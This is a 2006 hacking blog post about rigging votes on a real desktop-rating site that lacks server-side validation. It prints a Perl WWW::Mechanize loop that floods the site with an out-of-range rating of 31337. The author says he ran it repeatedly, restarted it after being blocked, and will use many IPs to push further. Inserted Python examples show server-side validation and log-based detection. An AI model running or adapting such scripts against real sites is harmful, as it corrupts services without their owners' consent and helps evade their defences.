Oopsies, can we say “no validation”?
Post by: Snarky on April 22nd, 2006 | Filed Under Hacking, Programming
I'm posting this as is, since time is key on this post. My CSS is screwed somehow, have to fix that; also it appears they caught on to my trick, and might validate now.
So... one big caveat of "secure programming" is to validate anything you're given. If you don't check that you get what you expect, well, people will give you something you don't, and Bad Things happen. The worst offender on this little problem is the internet. Yup, a lot of web sites figure "We'll put a cap on the web form's input, and not check server side, that'd be inefficient." Interesting theory; let's see what happens when you make this assumption on http://www.ratemydesktop.co.uk, where I posted a screenshot of my desktop.
First off, a quick HTML lesson for those of you who don't know. To display a form (a form being a place where the user can input data) on a website, you use the
<form>
tag. So, a full form might look something like
<form>
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=1';">1
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=2';">2
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=3';">3
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=4';">4
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=5';">5
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=6';">6
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=7';">7
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=8';">8
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=9';">9
<input type='radio' onClick="window.location='index.php?ac=0&id=165&rating=10';">10
<input type='radio' onClick="window.location='index.php?ac=2&id=165';">Don't vote
</form>
So, the above is an example of a bad form, but a form nonetheless, for a poll. You have 10 radio buttons, and when you click any of them, it sends you to a page that adds the vote. This is kind of a bad way to do things; I'd make those regular buttons, not radio buttons, but that's just me.
Now, where's the hack here? Can anyone spot why this is a horrible form? I'll give you a hint: it's in "window.location='index.php?ac=0&id=165&rating=8'". window.location is JavaScript that sends you to another page. So what this does is send you to index.php and pass it a few variables. Now do you see it? First off, it just sends the data as GET variables. That can be easily faked. Second, it sends the rating as a variable too. Now, to make this secure, you should check server side that the rating is between 1 and 10. Also, send this as POST, so people can't just send the data in the URL bar as a fake. Finally, whatever page you send it to should have some sort of limit on connections from one IP, and votes per IP, at the very least. Otherwise, people do stupid things like this. Note both the number of votes as compared to others, as well as the rating. (It's trending to 31337, just for fun.)
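Here is what the server side of that form could look like if it actually did the three things listed above: refuse anything but POST, check that the rating is a whole number from 1 to 10, and cap both request volume and votes per address. This is an added example written for this post in Python, not code from ratemydesktop.co.uk (the site's own handler is PHP and isn't shown here). The parameter names id and rating come from the form above; the limits, the VoteState store and the handle_vote function are assumptions for illustration. Requiring POST on its own does nothing against a scripted client, which is why the range check and the per-address limits do the real work.

```python
from collections import Counter, defaultdict, deque
from dataclasses import dataclass, field

MIN_RATING, MAX_RATING = 1, 10          # the only values the form can legitimately send
MAX_VOTES_PER_IP_PER_ITEM = 1           # assumed policy: one vote per address per desktop
MAX_REQUESTS_PER_WINDOW = 20            # assumed throttle: requests per address per window
WINDOW_SECONDS = 60.0


@dataclass
class VoteState:
    """In-memory stand-in for the site's database (an assumption for this example)."""
    tallies: dict = field(default_factory=lambda: defaultdict(list))   # item id -> ratings
    voted: Counter = field(default_factory=Counter)                     # (ip, item id) -> votes
    recent: dict = field(default_factory=lambda: defaultdict(deque))   # ip -> request times


def parse_rating(raw):
    """Return the rating as an int only if it is a plain decimal inside [1, 10], else None."""
    if not isinstance(raw, str) or not raw.isdigit():    # rejects None, "", "-3", "1e3", " 5"
        return None
    value = int(raw)
    if value < MIN_RATING or value > MAX_RATING:          # rejects 0 and 31337 alike
        return None
    return value


def handle_vote(state, method, client_ip, params, now):
    """Simulated vote endpoint. Returns (http_status, message); accepted votes are recorded."""
    # 1. Votes are only accepted via POST; a URL typed into the address bar arrives as GET.
    if method != "POST":
        return 405, "votes must be submitted with POST"

    # 2. Throttle raw request volume per address with a sliding window of timestamps.
    window = state.recent[client_ip]
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    window.append(now)
    if len(window) > MAX_REQUESTS_PER_WINDOW:
        return 429, "too many requests from this address"

    # 3. Validate every field the client sent; the form's own limits mean nothing here.
    item = params.get("id")
    if not isinstance(item, str) or not item.isdigit():
        return 400, "bad item id"
    rating = parse_rating(params.get("rating"))
    if rating is None:
        return 400, "rating must be a whole number from 1 to 10"

    # 4. Cap accepted votes per address per item.
    key = (client_ip, item)
    if state.voted[key] >= MAX_VOTES_PER_IP_PER_ITEM:
        return 409, "this address has already voted on this item"
    state.voted[key] += 1
    state.tallies[item].append(rating)
    return 200, "vote recorded"


def average_rating(state, item):
    """Mean of the accepted ratings for an item, or None if it has none."""
    votes = state.tallies.get(item, [])
    return sum(votes) / len(votes) if votes else None


if __name__ == "__main__":
    st = VoteState()
    print(handle_vote(st, "GET", "10.0.0.1", {"id": "165", "rating": "31337"}, 0.0))   # 405
    print(handle_vote(st, "POST", "10.0.0.1", {"id": "165", "rating": "31337"}, 1.0))  # 400
    print(handle_vote(st, "POST", "10.0.0.1", {"id": "165", "rating": "10"}, 2.0))     # 200
    print(handle_vote(st, "POST", "10.0.0.1", {"id": "165", "rating": "10"}, 3.0))     # 409
```

The per-address cap is only as strong as the address: someone with a pile of IPs, as this post goes on to note, gets a pile of votes, so on a real site you'd tie the vote to something harder to multiply than a source address as well.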
So, how'd I do that? I used a fun Perl module called WWW::Mechanize (overkill, I know), and made it go to the web page for rating 10. (Those links above are for my desktop.) The whole thing is 11 lines, some of which can easily be cut out (I think it could easily be only 6). Here it is:
#!/usr/bin/perl
use WWW::Mechanize;

my $mech = WWW::Mechanize->new( autocheck => 1 );
$vote_page = "http://www.ratemydesktop.co.uk/index.php?ac=4&id=165&rating=31337&tp=4&sstr=155";
$x = 1;
while($x ne -1) {
    print "Voting - $x\n";
    $mech->get( $vote_page );
    $x++;
}
Finally, I ssh'd into my box at home, where I wrote the above script, and started it running a coupla times.
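From the other side of the fence, the run of requests a script like that produces is easy to pick out of the web server's access log: one address hitting the vote URL over and over, a rating value nowhere near 1 to 10, and a library User-Agent string where a browser's should be. The following is an added example in Python, not anything from the site or from this post. The log lines are constructed in Apache combined format (addresses from the documentation ranges), the thresholds and the User-Agent prefixes are assumed heuristics, and the analyse function is hypothetical.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample of an Apache combined-format access log (not real logs from the site).
# One browser user rates once, one scripted client repeats an out-of-range rating,
# and one browser user repeats an in-range rating.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Apr/2006:10:01:01 +0100] "GET /index.php?ac=0&id=165&rating=8 HTTP/1.1" 200 2310 "http://www.ratemydesktop.co.uk/index.php?id=165" "Mozilla/5.0 (X11; Linux i686) Firefox/1.5"
198.51.100.9 - - [22/Apr/2006:10:01:02 +0100] "GET /index.php?ac=4&id=165&rating=31337&tp=4&sstr=155 HTTP/1.1" 200 2310 "-" "WWW-Mechanize/1.18"
198.51.100.9 - - [22/Apr/2006:10:01:02 +0100] "GET /index.php?ac=4&id=165&rating=31337&tp=4&sstr=155 HTTP/1.1" 200 2310 "-" "WWW-Mechanize/1.18"
198.51.100.9 - - [22/Apr/2006:10:01:03 +0100] "GET /index.php?ac=4&id=165&rating=31337&tp=4&sstr=155 HTTP/1.1" 200 2310 "-" "WWW-Mechanize/1.18"
198.51.100.9 - - [22/Apr/2006:10:01:03 +0100] "GET /index.php?ac=4&id=165&rating=31337&tp=4&sstr=155 HTTP/1.1" 200 2310 "-" "WWW-Mechanize/1.18"
192.0.2.44 - - [22/Apr/2006:10:02:10 +0100] "GET /index.php?ac=0&id=165&rating=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
192.0.2.44 - - [22/Apr/2006:10:02:14 +0100] "GET /index.php?ac=0&id=165&rating=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
192.0.2.44 - - [22/Apr/2006:10:02:19 +0100] "GET /index.php?ac=0&id=165&rating=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
192.0.2.44 - - [22/Apr/2006:10:02:23 +0100] "GET /index.php?ac=0&id=165&rating=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
192.0.2.44 - - [22/Apr/2006:10:02:28 +0100] "GET /index.php?ac=0&id=165&rating=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
"""

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

VOTE_FLOOD_THRESHOLD = 3                                 # assumed: votes per address per item
AUTOMATION_UA_PREFIXES = ("WWW-Mechanize", "libwww-perl")  # assumed heuristic, not a complete list


def parse_line(line):
    """Split one combined-format line into fields plus a flattened query-string dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = parse_qs(urlsplit(rec["path"]).query)
    rec["query"] = {k: v[0] for k, v in query.items()}   # keep the first value of each key
    return rec


def analyse(log_text):
    """Return ({ip: set of reasons}, Counter of (ip, item id) -> vote requests)."""
    findings = defaultdict(set)
    votes = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or "rating" not in rec["query"]:
            continue                                     # not a vote request at all
        ip, q = rec["ip"], rec["query"]
        rating = q["rating"]
        if not (rating.isdigit() and 1 <= int(rating) <= 10):
            findings[ip].add("rating_out_of_range")      # the form can only produce 1..10
        if rec["ua"].startswith(AUTOMATION_UA_PREFIXES):
            findings[ip].add("automation_user_agent")
        key = (ip, q.get("id", "?"))
        votes[key] += 1
        if votes[key] > VOTE_FLOOD_THRESHOLD:
            findings[ip].add("vote_flood")               # same address, same item, again and again
    return dict(findings), votes


if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for ip, reasons in sorted(found.items()):
        print(ip, sorted(reasons))
```

Only the vote_flood rule would catch the third address, which sends a perfectly valid rating from a normal browser; that's the case the per-IP vote limit in the previous section exists for, and it's why a detector that looks only at the rating value isn't enough.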
I realize this post is kinda rambling, but I'm writing it as I do this, and I've gotta get off to class. It appears they did kill my connections just now, all of them at once, but I was able to start them right back up. However, I stopped influencing the rating a while ago, so they might indeed have some sort of check in place. No matter, I've got enough IPs to get it to 31337 soon enough.